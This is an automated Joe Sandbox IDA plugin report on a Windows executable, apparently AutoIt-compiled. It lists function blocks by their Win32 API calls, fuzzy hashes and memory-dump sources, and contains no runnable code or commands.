                                          • Instruction ID: 864b703a2bcb0549948a5ea6d72e5cf44022a231eb66c05577856885bbbc905f
                                          • Opcode Fuzzy Hash: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
                                          • Instruction Fuzzy Hash: 27F12B75A00219EFCB14DFA8D884EAEB7B9FF49314F108059F906AB261DB31AE55CB50
                                          APIs
                                          • _memset.LIBCMT ref: 0012FD9E
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF31
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF55
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FF95
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0012FFB7
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00130133
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00130165
                                          • CloseHandle.KERNEL32(?), ref: 00130194
                                          • CloseHandle.KERNEL32(?), ref: 0013020B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: c021a65225c2f0f650d5c95154ef9d0cfe176a2773f849469d34e5b06a071349
                                          • Instruction ID: 6b1b81bd26286c8b8406ef5b07e3cc9f7a44bd6e6072fa3994280c45a425b3c2
                                          • Opcode Fuzzy Hash: c021a65225c2f0f650d5c95154ef9d0cfe176a2773f849469d34e5b06a071349
                                          • Instruction Fuzzy Hash: 78E19D31204341DFC719EF24D891BAABBE1BF89310F15896DF9899B2A2DB31DD41CB52
                                          APIs
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00113B8A,?), ref: 00114BE0
                                            • Part of subcall function 00114BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00113B8A,?), ref: 00114BF9
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • lstrcmpiW.KERNEL32(?,?), ref: 001152FB
                                          • _wcscmp.LIBCMT ref: 00115315
                                          • MoveFileW.KERNEL32(?,?), ref: 00115330
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: 1c6e7a51e5af9cf94b5a82ea4760e2aa3d924e2bb6502d5a52ca7bbbe8b8fada
                                          • Instruction ID: ebd97f61c5d3206fc4c22d09dc857c3d746f64e71e40f0170b971eea5c71651f
                                          • Opcode Fuzzy Hash: 1c6e7a51e5af9cf94b5a82ea4760e2aa3d924e2bb6502d5a52ca7bbbe8b8fada
                                          • Instruction Fuzzy Hash: 105184B20087859BC728DBA4D881DDFB7ECAF95310F50092EF189D3152EF74A6C98766
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00138D24
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
                                          • Instruction ID: fc159520a88566e720344e82d24703b88c4d74acfdd0b8a35fbbc985a0753e86
                                          • Opcode Fuzzy Hash: 92d940dd1969b436e087f22ded5d85f3e1a4f48da7d1db9262e14a20fe99f2e8
                                          • Instruction Fuzzy Hash: DD51AD30641304BFEF249F68CC89BE97BA4AB15360F244525FA15EB5E2CF71AD90CB61
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000EC638
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EC65A
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000EC672
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000EC690
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000EC6B1
                                          • DestroyIcon.USER32(00000000), ref: 000EC6C0
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000EC6DD
                                          • DestroyIcon.USER32(?), ref: 000EC6EC
                                            • Part of subcall function 0013AAD4: DeleteObject.GDI32(00000000), ref: 0013AB0D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
                                          • Instruction ID: 0d8d1d5b4112d2d430dd5e93cb48381a4825e6ce6d5149a0d33977f5535e1d4b
                                          • Opcode Fuzzy Hash: d6f65b20cc727ab2f89c92a82d23cc40362dcd98cb5e3f8daebb66ddd49683ad
                                          • Instruction Fuzzy Hash: EF51A770A0020AAFEB20DF25DC45FBA7BF5EB48710F100528F946A76A0DB71ED91DB60
                                          APIs
                                            • Part of subcall function 0010B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0010B54D
                                            • Part of subcall function 0010B52D: GetCurrentThreadId.KERNEL32 ref: 0010B554
                                            • Part of subcall function 0010B52D: AttachThreadInput.USER32(00000000,?,0010A23B,?,00000001), ref: 0010B55B
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A246
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0010A263
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0010A266
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A26F
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0010A28D
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A290
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0010A299
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0010A2B0
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0010A2B3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
                                          • Instruction ID: 521352af250dbefbcf2df42a7c57bb1f51d8cc4346d37ccbf73920482879e9c4
                                          • Opcode Fuzzy Hash: dd45f54e5bf9242e822fa8529b3f779d4c77a6a412d32a3edeb0f0927ad369ea
                                          • Instruction Fuzzy Hash: 0F1104B5950218BFF6116F619C8AF6A3F2DEF4D750F510429F3406B0E0CAF35C909AA0
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0010915A,00000B00,?,?), ref: 001094E2
                                          • HeapAlloc.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 001094E9
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 001094FE
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0010915A,00000B00,?,?), ref: 00109506
                                          • DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109509
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0010915A,00000B00,?,?), ref: 00109519
                                          • GetCurrentProcess.KERNEL32(0010915A,00000000,?,0010915A,00000B00,?,?), ref: 00109521
                                          • DuplicateHandle.KERNEL32(00000000,?,0010915A,00000B00,?,?), ref: 00109524
                                          • CreateThread.KERNEL32(00000000,00000000,0010954A,00000000,00000000,00000000), ref: 0010953E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
                                          • Instruction ID: 1e6bf85a4d632384b0c0cbaa3e8c0037541c7e85a3e0cdc9d7a4a70dc2cd94de
                                          • Opcode Fuzzy Hash: 8c600e49440cf1a498d3fe9c9a2f20e49f82fce051e81187f579b09cf9bcd05f
                                          • Instruction Fuzzy Hash: F501BBB9240304BFE711ABA6DC4DF6B7BACEB89B11F004411FB05DB5A1CA71D840CB20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 250f1c1c043b7f22363efb7d4f09d1c10e23aa0ce3fbb33091f6dc242e641da4
                                          • Instruction ID: 343a2b2bf3f2ff94ef4b59a32ea4f8293d2a4e375ef0e8c95bdc8c9ffaef1815
                                          • Opcode Fuzzy Hash: 250f1c1c043b7f22363efb7d4f09d1c10e23aa0ce3fbb33091f6dc242e641da4
                                          • Instruction Fuzzy Hash: 06C1A371A0022A9FDF14DF98E884AAEB7F5FF48310F548469E905EB281E770ED54CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-625585964
                                          • Opcode ID: ad2d4337395338dce58737bd858b717f163692ff35d86a951b031f2bcf47618e
                                          • Instruction ID: 2311c6dac61ab0e54ae6f4dd45d30c32e2f5f7bc61085aecec65dad1093fc125
                                          • Opcode Fuzzy Hash: ad2d4337395338dce58737bd858b717f163692ff35d86a951b031f2bcf47618e
                                          • Instruction Fuzzy Hash: A5919E70A00329ABDF24CFA9D884FEEBBB8EF45714F10855DF515AB251D7709950CBA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00137449
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0013745D
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00137477
                                          • _wcscat.LIBCMT ref: 001374D2
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001374E9
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00137517
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
                                          • Instruction ID: 172df96b062475fa945900553a7e7d3e9cf76425f73426f293ff0775901245fa
                                          • Opcode Fuzzy Hash: 09dd9e5b108ae245c0a7a1b82828a900f0d85b75b451735dfc538af0ae98cbd9
                                          • Instruction Fuzzy Hash: E14184B1904348AFEB219F64CC85BEE77A8EF48350F10442AFA89A71D1D7719D94CB60
                                          APIs
                                            • Part of subcall function 00114148: CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
                                            • Part of subcall function 00114148: Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
                                            • Part of subcall function 00114148: CloseHandle.KERNEL32(00000000), ref: 00114245
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F08D
                                          • GetLastError.KERNEL32 ref: 0012F0A0
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012F0CF
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0012F14C
                                          • GetLastError.KERNEL32(00000000), ref: 0012F157
                                          • CloseHandle.KERNEL32(00000000), ref: 0012F18C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 72dbb962195dffbe33b206fd7ab2505fa34c3ca861daa9e12083346af08d548e
                                          • Instruction ID: 093974f8e42e6cd5b5836810cb1aca9cee8760c4a4798af401d6df9fffbbe427
                                          • Opcode Fuzzy Hash: 72dbb962195dffbe33b206fd7ab2505fa34c3ca861daa9e12083346af08d548e
                                          • Instruction Fuzzy Hash: 9041CD302002019FD715EF24DCA5FADB7A2AF94714F04842CF9428B2D3CBB0A965CB86
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 0011357C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
                                          • Instruction ID: 90cae44403f3af907fbc653a2fdc27d9f37505b8c0e808d55a7dc5114458dc98
                                          • Opcode Fuzzy Hash: 65b025212073cf8be1707e29ae6b6539c018a30854b5f8e2034680d1705f0f40
                                          • Instruction Fuzzy Hash: AE112B7960D307BEE7495A14EC82CEA779DDF06B60B10003AFA2096282E7746FC045B5
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00114802
                                          • LoadStringW.USER32(00000000), ref: 00114809
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0011481F
                                          • LoadStringW.USER32(00000000), ref: 00114826
                                          • _wprintf.LIBCMT ref: 0011484C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011486A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00114847
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
                                          • Instruction ID: dbd1b2e1ec89ad7b5f9b629a4d734a1d806d0d6dbe5a0759fa3baae2268beff9
                                          • Opcode Fuzzy Hash: d106c08c754a5070fc5ae30e425fb7b0f9a53af7534f4557ad69378e4d00d574
                                          • Instruction Fuzzy Hash: 6E018FF68002087FE712D7A19D89EF6737CEB08300F4001A5BB0AE2051EB309EC44B71
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetSystemMetrics.USER32(0000000F), ref: 0013DB42
                                          • GetSystemMetrics.USER32(0000000F), ref: 0013DB62
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0013DD9D
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0013DDBB
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0013DDDC
                                          • ShowWindow.USER32(00000003,00000000), ref: 0013DDFB
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0013DE20
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0013DE43
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
                                          • Instruction ID: 1ee010bea24874fc33b6fb456fd806918660d892d5bf89144add9cd561ad0d48
                                          • Opcode Fuzzy Hash: 96a748780ebb4a5f4294dc5d169c5de75d0d414b7a691b135d93f674ed78f435
                                          • Instruction Fuzzy Hash: F5B1AA75600215EFDF18CF69E9857AD7BB1FF08701F098069ED48AF299D730A990CBA0
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013044E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3479070676-0
                                          • Opcode ID: 61d0b3ca4f786823c15cf2b91649a5a7a1732c928005184cfa2f81153b5f0cbd
                                          • Instruction ID: 38d92b193701292d275814aeb2aa77a45b7443a26f9434da7801f6a35b1cda9a
                                          • Opcode Fuzzy Hash: 61d0b3ca4f786823c15cf2b91649a5a7a1732c928005184cfa2f81153b5f0cbd
                                          • Instruction Fuzzy Hash: 68A17B702042019FCB16EF24C891FAEBBE5EF89314F14891DF5969B2A2DB31E955CF42
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000B2E9F
                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000,000000FF), ref: 000B2EE7
                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC55B
                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,000EC508,00000004,00000000,00000000,00000000), ref: 000EC5C7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
                                          • Instruction ID: 9c41a92b284164f01c2ecf516fdedac09d52cabea8d51a0c479d4a3f625dccb4
                                          • Opcode Fuzzy Hash: 6076438b49f552dad720fd5ddb8da31e1aa009937f5a0c5416ed1df6d55332c4
                                          • Instruction Fuzzy Hash: 4041F831604AC09ED7BA872B8DCCBEE7BE2AB96300F24440DE56756AA1C771F8C1D711
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00117698
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001176CF
                                          • EnterCriticalSection.KERNEL32(?), ref: 001176EB
                                          • _memmove.LIBCMT ref: 00117739
                                          • _memmove.LIBCMT ref: 00117756
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00117765
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0011777A
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00117799
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
